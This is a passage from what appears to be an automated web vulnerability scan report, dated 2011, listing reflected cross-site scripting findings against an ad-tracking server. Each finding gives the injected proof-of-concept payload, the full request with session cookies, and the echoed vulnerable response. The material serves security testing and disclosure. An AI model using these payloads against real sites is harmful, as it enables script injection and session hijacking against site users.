Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206270

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:58 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 323
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/1930434625/x547f058"><script>alert(1)</script>b51d3fd442a/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.194. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [Section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295399308@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b03d'-alert(1)-'3875fbe2ded was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1295399308@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work&Section=Careers5b03d'-alert(1)-'3875fbe2ded HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206270

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2032
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...

imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work&Section=Careers5b03d'-alert(1)-'3875fbe2ded';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.195. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [_RM_HTML_referer_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295399308@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70690'-alert(1)-'36a38fb3c80 was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1295399308@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work70690'-alert(1)-'36a38fb3c80&Section=Careers HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206270

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2032
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
= new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work70690'-alert(1)-'36a38fb3c80&Section=Careers';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection=
...[SNIP]...

1.196. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [_RM_HTML_title_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295399308@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 477bc'-alert(1)-'a401265b774 was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1295399308@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis477bc'-alert(1)-'a401265b774&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work&Section=Careers HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206270

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2088
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis477bc'-alert(1)-'a401265b774&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work&Section=Careers';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var x
...[SNIP]...

1.197. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295399308@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5bb8'-alert(1)-'162fa22f555 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1295399308@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work&Section=Careers&b5bb8'-alert(1)-'162fa22f555=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206270

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2035
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work&Section=Careers&b5bb8'-alert(1)-'162fa22f555=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.198. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [&_RM_HTML_url_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295663750@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5678'-alert(1)-'28fac782afa was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1295663750@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/peoplea5678'-alert(1)-'28fac782afa&_RM_HTML_title_=People%20-%20Xaxis&_RM_HTML_referer_=&Section=People HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/people
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206404

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1997
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
al preload the image request and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/peoplea5678'-alert(1)-'28fac782afa&_RM_HTML_title_=People%20-%20Xaxis&_RM_HTML_referer_=&Section=People';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
v
...[SNIP]...

1.199. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295663750@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2e0c"><script>alert(1)</script>d290c6a9e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxise2e0c"><script>alert(1)</script>d290c6a9e7/1295663750@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/people&_RM_HTML_title_=People%20-%20Xaxis&_RM_HTML_referer_=&Section=People HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/people
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206404

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 327
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxise2e0c"><script>alert(1)</script>d290c6a9e7/1268218/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG SRC
...[SNIP]...

1.200. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295663750@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad2bc"><script>alert(1)</script>31c70092ee9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1295663750@x54ad2bc"><script>alert(1)</script>31c70092ee9?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/people&_RM_HTML_title_=People%20-%20Xaxis&_RM_HTML_referer_=&Section=People HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/people
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206404

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:47 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 323
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/1301858921/x54ad2bc"><script>alert(1)</script>31c70092ee9/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.201. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [Section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295663750@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80bf9'-alert(1)-'5a103aaca43 was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1295663750@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/people&_RM_HTML_title_=People%20-%20Xaxis&_RM_HTML_referer_=&Section=People80bf9'-alert(1)-'5a103aaca43 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/people
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206404

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1997
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/people&_RM_HTML_title_=People%20-%20Xaxis&_RM_HTML_referer_=&Section=People80bf9'-alert(1)-'5a103aaca43';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.202. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [_RM_HTML_referer_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295663750@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cf9c'-alert(1)-'b908b68ff87 was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1295663750@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/people&_RM_HTML_title_=People%20-%20Xaxis&_RM_HTML_referer_=9cf9c'-alert(1)-'b908b68ff87&Section=People HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/people
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206404

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1997
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
EO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/people&_RM_HTML_title_=People%20-%20Xaxis&_RM_HTML_referer_=9cf9c'-alert(1)-'b908b68ff87&Section=People';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='
...[SNIP]...

1.203. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [_RM_HTML_title_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295663750@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f76a'-alert(1)-'f0dd92b65ad was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1295663750@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/people&_RM_HTML_title_=People%20-%20Xaxis9f76a'-alert(1)-'f0dd92b65ad&_RM_HTML_referer_=&Section=People HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/people
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206404

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2053
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
es not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/people&_RM_HTML_title_=People%20-%20Xaxis9f76a'-alert(1)-'f0dd92b65ad&_RM_HTML_referer_=&Section=People';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section=''
...[SNIP]...

1.204. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295663750@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a8cc'-alert(1)-'42687825ae9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1295663750@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/people&_RM_HTML_title_=People%20-%20Xaxis&_RM_HTML_referer_=&Section=People&8a8cc'-alert(1)-'42687825ae9=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/people
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206404

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2000
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/people&_RM_HTML_title_=People%20-%20Xaxis&_RM_HTML_referer_=&Section=People&8a8cc'-alert(1)-'42687825ae9=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.205. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [&_RM_HTML_url_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
